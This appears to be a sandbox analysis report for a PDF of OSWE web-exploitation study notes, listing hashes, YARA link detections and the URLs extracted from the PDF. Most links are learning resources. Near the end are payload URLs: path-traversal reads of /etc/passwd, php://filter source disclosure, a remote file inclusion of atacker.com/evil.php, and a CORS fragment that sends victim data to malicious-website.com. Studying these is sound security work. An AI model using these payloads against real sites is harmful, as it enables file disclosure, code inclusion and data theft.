OSWE%20NOTES%20BASIC%20BY%20JOAS[1][.]pdf

Sharing

Copy URL Twitter E-mail

General

Target

OSWE%20NOTES%20BASIC%20BY%20JOAS[1].pdf
Size

10.0MB
MD5

e6c891bbc3ecacfd95b6a81596b412ac
SHA1

5714096b6f6901fa9b856eac3470286630c66c55
SHA256

ee7a7f3e07aba6da3f234395a52d1cd7023d7d8067ba5f745589184f614bfe05
SHA512

66a37d1a44cf0eb89b78f93a09d1bf26d6b7d44836d184f72d6f3192764f7c58ec8d657aa657eba80781485b491ddcf426cece019fe97cc53b036b2c63876984
SSDEEP

196608:xuEnWzf+EGhnnSsUkBQAVTry8SFYY9xndUELvsB1sKYWjoCj5gNZ9:HnWjFGhnnSRkBQuTry8STTndJA1sKb1O

Score

4^/10

pdf link

Malware Config

Signatures

HTTP links in PDF interactive object 1 IoCs

Detects HTTP links in interactive objects within PDF files.

pdf link

resource	yara_rule
sample	pdf_with_link_action

One or more HTTP URLs in PDF identified
Detects presence of HTTP links in PDF files.
pdf link

Files

OSWE%20NOTES%20BASIC%20BY%20JOAS[1].pdf
.pdf
- https://www.linkedin.com/in/joas-antonio-dos-santos
- https://pentesterlab.com/
- https://www.hackthebox.eu/
- https://portswigger.net/academy/labs
- https://vulnhub.com/
- https://klezvirus.github.io/Misc/HTB-VH-OSWE/reviews/vulnhub/pipe
- https://klezvirus.github.io/Misc/HTB-VH-OSWE/reviews/vulnhub/raven2
- https://klezvirus.github.io/Misc/HTB-VH-OSWE/reviews/vulnhub/homeless
- https://klezvirus.github.io/Misc/HTB-VH-OSWE/reviews/vulnhub/ted
- https://klezvirus.github.io/Misc/HTB-VH-OSWE/reviews/vulnhub/flick2
- https://portswigger.net/burp/documentation/desktop/penetration-testing
- https://portswigger.net/burp/documentation/desktop/tools/intruder/using#typical-uses
- https://portswigger.net/burp/documentation/desktop/tools/target/site-map/comparing
- https://portswigger.net/burp/documentation/desktop/tools/proxy/history
- https://portswigger.net/web-security/sql-injection/blind
- https://portswigger.net/burp/documentation/desktop/tools/decoder#working-manually
- https://www.hackingarticles.in/burpsuite-encoder-decoder-tutorial/
- https://docs.python.org/3/library/http.server.html
- http://127.0.0.1:8080/
- http://127.0.0.1/example
- https://pythonbasics.org/webserver/
- https://learn.adafruit.com/raspipe-a-raspberry-pi-pipeline-viewer-part-2/miniature-web-applications-in-python-with-flask
- https://en.wikipedia.org/wiki/Transmission_Control_Protocol
- https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol
- https://en.wikipedia.org/wiki/Request%E2%80%93response
- https://tools.ietf.org/html/rfc2616#section-5
- https://tools.ietf.org/html/rfc2616#section-5.1
- https://tools.ietf.org/html/rfc2616#section-6
- http://rack.github.io/
- http://www.rubydoc.info/github/rack/rack/file/SPEC#The_Environment
- https://blog.appsignal.com/2016/11/23/ruby-magic-building-a-30-line-http-server-in-ruby.html
- https://github.com/dnSpy/dnSpy/releases
- https://github.com/dnSpy/dnSpy/blob/master/images/debug-animated.gif
- https://github.com/dnSpy/dnSpy/blob/master/images/edit-code-animated.gif
- https://github.com/dnSpy/dnSpy-Unity-mono
- https://github.com/dnSpy/dnSpy/releases/unity
- https://github.com/icsharpcode/ILSpy/wiki/Plugins
- https://marketplace.visualstudio.com/items?itemName=SharpDevelopTeam.ILSpy2022
- https://marketplace.visualstudio.com/items?itemName=SharpDevelopTeam.ILSpy
- https://github.com/icsharpcode/ilspy-vscode
- https://marketplace.visualstudio.com/items?itemName=icsharpcode.ilspy-vscode
- http://www.avaloniaui.net/
- https://github.com/icsharpcode/AvaloniaILSpy
- https://www.nuget.org/packages/ICSharpCode.Decompiler/
- https://github.com/icsharpcode/ILSpy/blob/master/ICSharpCode.Decompiler.Console
- https://github.com/icsharpcode/ILSpy/blob/master/ICSharpCode.Decompiler.PowerShell
- https://github.com/icsharpcode/ILSpy/issues/829
- https://github.com/icsharpcode/ILSpy/wiki/Search-Options
- https://github.com/icsharpcode/ILSpy/wiki/Metadata-Explorer
- https://github.com/icsharpcode/ILSpy/wiki/ILSpy.ReadyToRun
- https://github.com/icsharpcode/ILSpy/wiki/Additional-Features-in-DEBUG-Builds
- https://github.com/icsharpcode/ILSpy/blob/master/doc/ILSpyAboutPage.txt
- https://github.com/icsharpcode/ILSpy/blob/master/doc/third-party-notices.txt
- https://docs.microsoft.com/en-us/visualstudio/install/import-export-installation-configurations?view=vs-2019#import-a-configuration
- https://docs.microsoft.com/en-us/visualstudio/install/import-export-installation-configurations?view=vs-2019#automatically-install-missing-components
- https://dotnet.microsoft.com/download/dotnet/6.0
- https://github.com/PowerShell/PowerShell
- https://improsec.com/tech-blog?author=5bec087b49bad6ce989e9a11
- https://github.com/codingo/cracknet
- http://flare-on.com/
- https://github.com/easyctf/easyctf-iv-problems/tree/master/maldropper
- https://improsec.com/tech-blog/reverse-engineering-part-1
- https://cryptii.com/
- https://rioasmara.com/2020/08/05/analyze-encryption-and-decryption-using-dnspy/
- https://www.dnnsoftware.com/
- https://nvd.nist.gov/vuln/detail/CVE-2020-5188
- https://nvd.nist.gov/vuln/detail/CVE-2020-5186
- http://www.w3.org/1999/xhtml
- https://nvd.nist.gov/vuln/detail/CVE-2020-5187
- https://www.exploit-db.com/exploits/44414
- https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine
- https://java-decompiler.github.io/
- https://github.com/mstrobel/procyon/wiki/Java-Decompiler
- https://github.com/icsharpcode/ILSpy
- https://www.benf.org/other/cfr/
- http://www.kpdus.com/jad.html
- https://ecd-plugin.github.io/ecd/
- https://mkyong.com/java/java-decompiler-plugin-for-eclipse/
- https://github.com/fesh0r/fernflower
- https://www.baeldung.com/eclipse-debugging
- https://www.baeldung.com/intellij-basics
- https://marketplace.eclipse.org/content/enhanced-class-decompiler
- https://www.baeldung.com/wp-content/uploads/2020/01/Eclipse_class.jpg
- https://www.baeldung.com/wp-content/uploads/2020/01/Eclipse_classWithoutSource.jpg
- https://www.baeldung.com/wp-content/uploads/2020/01/Eclipse.jpg
- https://www.baeldung.com/wp-content/uploads/2020/01/IntelliJIDEA.png
- https://github.com/betterphp/JDCommandLine
- https://www.baeldung.com/linux/files-vi-nano-emacs
- https://mkyong.com/java/how-to-decompile-class-in-java/
- https://www.baeldung.com/java-decompiling-classes
- https://www.udemy.com/topic/java/
- https://github.com/MunGell/awesome-for-beginners
- https://www.baeldung.com/wp-content/uploads/2020/01/IntelliJIDEA.2.jpg
- https://www.exploit-db.com/exploits/20009
- https://www.cvedetails.com/vulnerability-list/vendor_id-4037/Atmail.html
- https://github.com/jbarone/xxelab
- https://www.linkedin.com/in/naman-kumar-a21653176/
- https://www.hackingarticles.in/comprehensive-guide-on-xxe-injection/
- https://www.hackingarticles.in/beginner-guide-sql-injection-part-1/
- https://www.linkedin.com/in/aarti--singh/
- https://www.hackingarticles.in/bypass-filter-sql-injection-manually/
- https://www.safe.security/resources/blog/introduction-to-session-hijacking-and-riding/
- https://www.codecademy.com/learn/introduction-to-javascript
- https://www.udemy.com/topic/javascript/
- https://hackr.io/blog/best-javascript-courses
- https://github.com/coding-girl93/programming-books
- https://portswigger.net/daily-swig/javascript
- https://twitter.com/Voulnet
- https://twitter.com/securitymb
- https://portswigger.net/web-security/cross-site-scripting
- https://portswigger.net/web-security/sql-injection
- https://snyk.io/blog/after-three-years-of-silence-a-new-jquery-prototype-pollution-vulnerability-emerges-once-again/
- https://portswigger.net/daily-swig/denial-of-wallet-attacks-how-to-protect-against-costly-exploits-targeting-serverless-setups
- https://twitter.com/po6ix
- https://portswigger.net/daily-swig/elk-stack-exploit-for-kibana-remote-code-execution-flaw-released-on-github
- https://portswigger.net/daily-swig/prototype-pollution-bug-in-popular-node-js-library-leaves-web-apps-open-to-dos-remote-shell-attacks
- https://hackerone.com/reports/869574
- https://portswigger.net/daily-swig/node-js-applications-open-to-prototype-pollution-attacks-via-legacy-function-in-popular-encryption-library
- https://snyk.io/vuln/SNYK-JS-NODEFORGE-598677
- https://portswigger.net/daily-swig/vulnerabilities
- https://portswigger.net/daily-swig/trojannet-a-simple-yet-effective-attack-on-machine-learning-models
- https://portswigger.net/daily-swig/remote-code-execution-vulnerability-exposed-in-popular-javascript-serialization-package
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- https://portswigger.net/daily-swig/java
- https://learn.snyk.io/lessons/prototype-pollution/javascript/
- https://portswigger.net/daily-swig/prototype-pollution-the-dangerous-and-underrated-vulnerability-impacting-javascript-applications
- https://www.whitesourcesoftware.com/resources/blog/prototype-pollution-vulnerabilities/
- https://medium.com/@zub3r.infosec/exploiting-prototype-pollutions-220f188438b2
- https://portswigger.net/web-security/cors/same-origin-policy
- https://portswigger.net/web-security/csrf
- https://portswigger.net/web-security/all-labs#cross-origin-resource-sharing-cors
- https://portswigger.net/web-security/cors/access-control-allow-origin
- https://portswigger.net/web-security/csrf/tokens
- https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack
- https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack
- https://portswigger.net/web-security/cross-site-scripting/exploiting
- https://portswigger.net/web-security/cors
- https://we45.com/blog/3-ways-to-exploit-cors-misconfiguration
- https://book.hacktricks.xyz/pentesting-web/cors-bypass
- https://www.acunetix.com/blog/articles/owasp-top-10-2017/
- https://www.acunetix.com/websitesecurity/cross-site-scripting/
- https://owasp.org/www-pdf-archive/AppSecEU2012_Wilander.pdf
- https://www.acunetix.com/websitesecurity/csrf-attacks/
- https://brightsec.com/blog/cross-site-request-forgery-csrf/
- https://www.imperva.com/learn/application-security/csrf-cross-site-request-forgery/
- https://github.com/moul/advanced-csrf
- https://portswigger.net/burp/documentation/desktop/functions/generate-csrf-poc
- https://www.w3schools.com/xml/xml_http.asp
- https://javascript.info/xmlhttprequest#the-basics
- https://javascript.info/url
- https://javascript.info/xmlhttprequest#response-type
- https://javascript.info/arraybuffer-binary-arrays
- https://javascript.info/blob
- https://javascript.info/xmlhttprequest#ready-states
- https://xhr.spec.whatwg.org/#states
- https://javascript.info/xmlhttprequest#aborting-request
- https://javascript.info/xmlhttprequest#synchronous-requests
- https://javascript.info/xmlhttprequest#http-headers
- https://xhr.spec.whatwg.org/#the-setrequestheader()-method
- https://javascript.info/xmlhttprequest#post-formdata
- https://developer.mozilla.org/en-US/docs/Web/API/FormData
- https://javascript.info/xmlhttprequest#upload-progress
- https://javascript.info/xmlhttprequest#cross-origin-requests
- https://javascript.info/fetch-crossorigin
- https://javascript.info/xmlhttprequest#summary
- https://xhr.spec.whatwg.org/#events
- https://javascript.info/xmlhttprequest
- https://www.npmjs.com/package/xmlbuilder
- https://www.npmjs.com/package/xml2json
- https://www.npmjs.com/package/xml-js
- https://www.npmjs.com/package/object-to-xml
- https://www.npmjs.com/package/xml2js
- http://www.w3.org/TR/rec-xml
- https://www.npmjs.com/package/express-xml-bodyparser
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept
- https://www.akinjide.me/2019/xml-request-and-response-with-express-js/#fn:2
- https://json.org/
- https://yaml.org/
- https://www.akinjide.me/2019/xml-request-and-response-with-express-js/
- https://levelup.gitconnected.com/node-js-tips-xml-mysql-http-requests-and-deleting-files-13458cb2562a
- https://usefulangle.com/post/106/nodejs-read-xml
- https://www.codecademy.com/learn/learn-php
- https://medium.com/javarevisited/10-best-php-courses-for-beginners-and-experienced-developers-db18057a814f
- https://www.w3schools.com/php/
- https://www.netsparker.com/server-security-software/php-security-scanner/
- https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/
- https://www.invicti.com/blog/web-security/php-type-juggling-vulnerabilities/
- https://www.netsparker.com/blog/web-security/collision-based-hashing-algorithm-disclosure/
- https://www.youtube.com/watch?v=ASYuK01H3Po&feature=emb_imp_woyt
- https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
- https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09
- https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
- https://en.wikipedia.org/wiki/Associative_property
- https://en.wikipedia.org/wiki/Order_of_operations
- https://itasahobby.gitlab.io/posts/trustedclient/
- https://regexone.com/
- https://github.com/ziishaned/learn-regex
- https://security.stackexchange.com/questions/71169/xss-bypass-this-regexp
- https://regexr.com/
- https://www.hackerrank.com/domains/regex
- https://portswigger.net/web-security/server-side-template-injection
- https://www.youtube.com/watch?v=3cT0uE7Y87s
- https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf
- http://twig.sensiolabs.org/
- http://freemarker.org/
- http://www.ush.it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/
- http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/
- https://code.google.com/p/mustache-security/
- https://portswigger.net/research/server-side-template-injection#Identify
- https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt
- https://portswigger.net/web-security/information-disclosure
- https://velocity.apache.org/
- https://docs.oracle.com/javase/7/docs/api/java/lang/Runtime.html#exec%28java.lang.String%29
- http://www.smarty.net/
- http://www.smarty.net/docs/en/advanced.features.tpl#advanced.features.security
- https://github.com/smarty-php/smarty/blob/fa269d418fb4d3687558746e67e054c225628d13/libs/sysplugins/smarty_internal_data.php#L385
- https://github.com/smarty-php/smarty/blob/fa269d418fb4d3687558746e67e054c225628d13/libs/sysplugins/smarty_internal_write_file.php#L16
- https://github.com/smarty-php/smarty/blob/fa269d418fb4d3687558746e67e054c225628d13/libs/sysplugins/smarty_internal_data.php#L372
- https://github.com/twigphp/Twig/blob/e22fb8728b395b306a06785a3ae9b12f3fbc0294/lib/Twig/Environment.php
- https://github.com/twigphp/Twig/blob/e22fb8728b395b306a06785a3ae9b12f3fbc0294/lib/Twig/Environment.php#L233
- http://php.net/manual/en/filesystem.configuration.php
- http://php.net/manual/en/function.call-user-func.php
- https://github.com/twigphp/Twig/blob/e22fb8728b395b306a06785a3ae9b12f3fbc0294/lib/Twig/Environment.php#L874
- https://github.com/twigphp/Twig/blob/d63ac2088e8d30137cde10f310ab89b06dab916b/lib/Twig/Sandbox/SecurityPolicy.php#L83
- https://github.com/twigphp/Twig/blob/e22fb8728b395b306a06785a3ae9b12f3fbc0294/lib/Twig/Template.php#L139
- http://jade-lang.com/
- http://codepen.io/
- https://www.alfresco.com/
- https://portswigger.net/web-security/cross-site-scripting/stored
- http://www.xwiki.org/
- http://platform.xwiki.org/xwiki/bin/view/ScriptingDocumentation/
- https://portswigger.net/research/server-side-template-injection
- https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
- https://thibaud-robin.fr/articles/bypass-filter-upload/
- https://www.aptive.co.uk/blog/unrestricted-file-upload-testing/
- https://pentestlab.blog/2012/11/29/bypassing-file-upload-restrictions/
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
- https://book.hacktricks.xyz/pentesting-web/file-upload
- https://medium.com/@nyomanpradipta120/unrestricted-file-upload-in-php-b4459eef9698
- https://www.tutorialspoint.com/python_penetration_testing/python_penetration_testing_sqli_web_attack.htm
- https://bad-jubies.github.io/Blind-SQLi-1/
- https://github.com/21y4d/blindSQLi
- https://portswigger.net/web-security
- https://enetolabs.medium.com/exploiting-blind-sqli-with-python-c401a7fddece
- https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
- https://book.hacktricks.xyz/pentesting/pentesting-mysql
- https://github.com/c002/pentest/blob/master/SQL%20Injection%20Cheat%20Sheet:%20MySQL
- https://www.phillips321.co.uk/2012/03/06/mysql-cheat-sheet/
- https://cobalt.io/blog/a-pentesters-guide-to-file-inclusion
- https://highon.coffee/blog/lfi-cheat-sheet/
- https://book.hacktricks.xyz/pentesting-web/file-inclusion
- https://shahrukhathar.info/local-file-inclusion-lfi-cheat-sheet/
- https://github.com/russweir/OSCP-cheatsheet/blob/master/File%20Inclusion.md
- https://sushant747.gitbooks.io/total-oscp-guide/content/local_file_inclusion.html
- https://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu/
- https://www.hackingarticles.in/apache-log-poisoning-through-lfi/
- https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
- https://docs.wallarm.com/attacks-vulns-list/#remote-code-execution-rce
- https://www.wallarm.com/what/a8-insecure-deserialization-2017-owasp
- https://www.wallarm.com/what/api-security-tutorial
- https://www.wallarm.com/what/buffer-overflow-attack-definition-types-use-by-hackers-part-1
- https://www.wallarm.com/what/the-concept-of-rce-remote-code-execution-attac
- https://www.checkpoint.com/cyber-hub/cyber-security/what-is-remote-code-execution-rce/
- https://www.youtube.com/watch?v=lN7AALWXUbo
- https://www.bugcrowd.com/glossary/remote-code-execution-rce/
- https://blog.sqreen.com/remote-code-execution-rce-explained/
- https://github.com/NickstaDB/DeserLab
- https://thedarksource.com/vulnerable-java-deserialization-lab-setup-for-practice-exploitation/
- https://github.com/joaomatosf/JavaDeserH2HC
- https://portswigger.net/web-security/access-control
- https://portswigger.net/web-security/ssrf
- https://www.offensive-security.com/documentation/awae-syllabus.pdf
- https://requests.readthedocs.io/en/master/
- https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting-ebook/dp/B005LVQA9S
- https://portswigger.net/burp/communitydownload
- https://regex101.com/
- https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/
- https://owasp.org/www-project-vulnerable-web-applications-directory/
- https://owasp.org/www-project-security-knowledge-framework/
- https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce/
- https://sarthaksaini.com/2019/awae/xss-rce.html
- https://blog.ripstech.com/2019/magento-rce-via-xss/
- https://medium.com/@knownsec404team/the-analysis-of-mybb-18-20-from-stored-xss-to-rce-7234d7cc0e72
- https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf
- http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html
- https://www.owasp.org/index.php/Unrestricted_File_Upload
- https://www.corben.io/atlassian-crowd-rce/
- https://www.youtube.com/watch?v=NMGsnPSm8iw
- https://www.youtube.com/watch?v=LfbwlPxToBc
- https://rebraws.github.io/ATutorAuthBypass/
- https://srcincite.io/advisories/src-2016-0009/
- https://www.exploit-db.com/exploits/39639
- https://blog.ripstech.com/2018/cubecart-admin-authentication-bypass/
- https://underdefense.com/n-day-exploit-development-and-upgrade-to-rce/
- http://imranparay.blogspot.com/2018/09/testing-password-reset-functionalities.html
- https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html
- https://blog.appsecco.com/mass-account-pwning-or-how-we-hacked-multiple-user-accounts-using-weak-reset-tokens-for-passwords-c2d6c0831377
- https://medium.com/@notsoshant/a-not-so-blind-rce-with-sql-injection-13838026331e
- https://medium.com/bugbountywriteup/sql-injection-to-lfi-to-rce-536bed29a862
- https://pentesterlab.com/exercises/from_sqli_to_shell_II/course
- https://blog.ripstech.com/2019/oxid-esales-shop-software/
- https://www.acunetix.com/websitesecurity/blind-sql-injection/
- https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf
- http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt
- https://dotcppfile.wordpress.com/2014/07/12/blind-postgresql-sql-injection-tutorial/
- http://pentestmonkey.net/category/cheat-sheet/sql-injection
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- https://blog.ripstech.com/2019/dotcms515-sqli-to-rce/
- https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html
- https://capacitorset.github.io/mathjs/
- https://itnext.io/how-i-exploited-a-remote-code-execution-vulnerability-in-fast-redact-9e69fa35572f
- https://rhinosecuritylabs.com/application-security/nvidia-rce-cve-2019-5678/
- https://idiallo.com/javascript/settimeout-and-setinterval-and-setevil
- https://www.websecgeeks.com/2017/04/pentesting-nodejs-application-nodejs.html
- https://maikthulhu.github.io/2019-05-17-remote-debugging-node-vscode/
- https://blog.netspi.com/escape-nodejs-sandboxes/
- https://medium.com/@Q2hpY2tlblB3bnk/php-type-juggling-c34a10630b10
- https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/
- http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html
- https://www.netsparker.com/blog/web-security/type-juggling-authentication-bypass-cms-made-simple/
- https://www.whitehatsec.com/blog/magic-hashes/
- https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/
- https://www.youtube.com/watch?v=ASYuK01H3Po
- https://www.youtube.com/watch?v=CUbWpteTfio
- https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Deserialization
- https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf
- https://klezvirus.github.io/The_Big_Problem_of_Serialisation/
- https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/
- https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/
- https://www.n00py.io/2017/11/exploiting-blind-java-deserialization-with-burp-and-ysoserial/
- https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild
- https://medium.com/@knownsec404team/analysis-of-weblogic-deserialization-vulnerability-cve-2018-2628-164bbed7a71d
- https://www.youtube.com/watch?v=VviY3O-euVQ
- https://www.nccgroup.trust/globalassets/our-research/uk/images/whitepaper-new.pdf
- https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/
- https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui
- https://www.youtube.com/watch?v=oUAeWhW5b8c
- https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
- https://www.youtube.com/watch?v=FPgK_udcBig
- https://blog.ripstech.com/2018/php-object-injection/
- https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/
- https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a
- https://medium.com/@knownsec404team/analysis-of-typo3-deserialization-vulnerability-cve-2019-12747-5863c48f39a7
- https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066
- https://www.youtube.com/watch?v=HaW15aMzBUM
- https://www.youtube.com/watch?v=fHZKSCMWqF4
- https://www.youtube.com/watch?v=_Zj0B4D4TYc
- https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
- https://www.linkedin.com/pulse/good-bad-rce-remote-code-execution-nodejs-ionut-indre/
- https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
- https://www.yeahhub.com/nodejs-deserialization-attack-detailed-tutorial-2018/
- https://www.youtube.com/watch?v=aS6z4NgRysU
- https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
- https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/
- https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
- https://codewhitesec.blogspot.com/2015/08/cve-2015-3269-apache-flex-blazeds-xxe.html
- https://medium.com/@knownsec404team/weblogic-ejbtaglibdescriptor-xxe-vulnerability-analysis-cve-2019-2888-bd649f5fcfa6
- https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34
- https://0day.work/jinja2-template-injection-filter-bypasses/
- http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic/
- https://portswigger.net/web-security/websockets
- https://www.youtube.com/watch?v=-ALjHUqSz_Y
- https://www.netsparker.com/blog/web-security/remote-hardware-takeover-via-vulnerable-admin-software/
- https://www.notsosecure.com/how-cross-site-websocket-hijacking-could-lead-to-full-session-compromise/
- https://pentesterlab.com/exercises/codereview/course
- https://shells.systems/category/static-code-analysis/
- https://trendmicro.github.io/SecureCodingDojo/codereview101/
- https://www.youtube.com/watch?v=Sb011qfbMkQ
- https://prakhar.prasad.pro/blog/shopify-remote-code-execution/
- https://hydrasky.com/network-security/finding-vulnerabilities-in-source-code-aps-net/
- https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817
- https://srcincite.io/blog/
- https://www.youtube.com/watch?v=Xfbu-pQ1tIc&list=PLwvifWoWyqwqkmJ3ieTG6uXUSuid95L33
- https://hansesecure.de/2019/08/from-awae-to-oswe-the-preperation-guide/?lang=en
- https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside
- https://cyber-dragon.nl/2020/06/10/oswe-cheat-sheet/
- https://github.com/wetw0rk/AWAE-PREP
- https://codewhitesec.blogspot.com/
- https://blog.ripstech.com/
- https://rhinosecuritylabs.com/
- https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/
- https://github.com/CyberSecurityUP/OSCE-Complete-Guide
- https://pentesterlab.com
- https://www.hackthebox.eu
- https://vulnhub.com
- https://portswigger.net
- https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages
- http://portswigger.net
- https://pythonbasics.org
- http://TCPServer.new
- http://Time.now
- http://TCPSocket.new
- http://Proc.new
- http://app.call
- http://Lobster.new
- https://github.com/dnSpy/dnSpy.git
- http://build.ps
- https://cryptii.com
- https://www.dnnsoftware.com/.
- http://www.dnnsoftware.com
- https://dotnetnuke.codeplex.com/releases/view/611324
- http://outlook.com
- http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=&culture=en-US&executeinstall
- http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=
- http://example.com
- https://dotnetnuke.codeplex.com/releases/view/615317
- http://www.dnnsoftware.com/platform/manage/security-center
- http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue
- http://xhr.open
- http://www.w3.org/2000/svg
- http://www.w3.org/1999/xlink
- https://github.com/jbarone/xxelab.git
- http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net
- http://apache.org/xml/features/disallow-doctype-decl
- http://customer.to
- http://customer.__proto__.to
- http://Object.to
- http://normal-website.com
- https://innocent-website.com
- http://hackersnormal-website.com
- http://normal-website.com.evil-user.net
- http://vulnerable-website.com
- http://req.open
- http://vulnerable-website.com/sensitive-victim-data',true
- http://malicious-website.com/log?key='+this.responseText;
- https://malicious-website.com
- http://malicious-website.com
- https://vulnerable-website.com/sensitive-victim-data',true
- https://subdomain.vulnerable-website.com
- http://subdomain.vulnerable-website.com
- https://subdomain.vulnerable-website.com/?xss=
- http://trusted-subdomain.vulnerable-website.com
- https://vulnerable-website.com
- http://intranet.normal-website.com
- https://normal-website.com
- https://owasp.org/www-pdf-archive//AppSecEU2012_Wilander.pdf
- http://event.total
- https://google.com/search'
- https://google.com/search?q=test+me%21
- http://anywhere.com/request'
- http://app.post
- http://gmail.com
- http://yahoo.com
- https://github.com/Leonidas-from-XIV/node-xml2js#options-for-the-builder-class.
- http://builder.build
- https://github.com/macedigital/express-xml-bodyparser
- https://github.com/Leonidas-from-XIV/node-xml2js#options
- http://request.app.is
- http://akinjide.me
- http://first.open
- http://second.open
- http://Array.prototype.to
- https://regexone.com
- https://regexr.com
- http://user.name
- http://freemarker.org/docs/app_faq.html#faq_template_uploading_security
- http://freemarker.org/docs/ref_builtins_expert.html#ref_builtin_new
- https://velocity.apache.org/tools/releases/2.0/summary.html:
- https://velocity.apache.org/tools/releases/2.0/summary.html
- http://chr.to
- http://out.read
- http://attacker.net:2121
- http://CodePen.io
- http://attacker.net
- http://do_csrf.open
- http://alfresco.sh
- http://docs.alfresco.com/5.0/tasks/alfresco-start.html
- http://platform.xwiki.org/xwiki/bin/view/DevGuide/Scripting
- http://doc.save
- http://internal-server.net
- http://test.zip
- http://request.open
- http://request.select
- http://response.read
- http://browser.open
- http://browser.select
- http://res.read
- http://vulnerable-site.com/index.php?page=../../../etc/passwd
- http://vulnerable-site.com/index.php?page=....//....//....//etc/passwd
- http://vulnerable-site.com/index.php?page=....
- http://vulnerable-site.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
- http://vulnerable-site.com/index.php?page=../../../etc/passwd%00
- http://vulnerable-site.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
- http://vulnerable-site.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
- http://vulnerable-site.com/index.php?page=%252e%252e%252fetc%252fpasswd
- http://vulnerable-site.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
- http://vulnerable-site.com/index.php?page=utils/scripts/../../../../../etc/passwd
- http://vulnerable-site.com/index.php?page=a/../../../../../../../../../etc/passwd..
- http://vulnerable-site.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD
- http://vulnerable-site.com/index.php?page=a/./.[ADD
- http://vulnerable-site.com/index.php?page=a/../../../../[ADD
- http://vulnerable-site.com/index.php?page=....//....//etc/passwd
- http://vulnerable-site.com/index.php?page=..///////..////..//////etc/passwd
- http://vulnerable-site.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
- http://vulnerable-site.com/index.php?page=/var/www/../../etc/passwd
- http://vulnerable-site.com/index.php?page=http://atacker.com/evil.php
- http://vulnerable-site.com/index.php?page=
- http://attacker.com
- http://vulnerable-site.com/index.php?page=php://filter/read=string.rot13/resource=index.php
- http://vulnerable-site.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
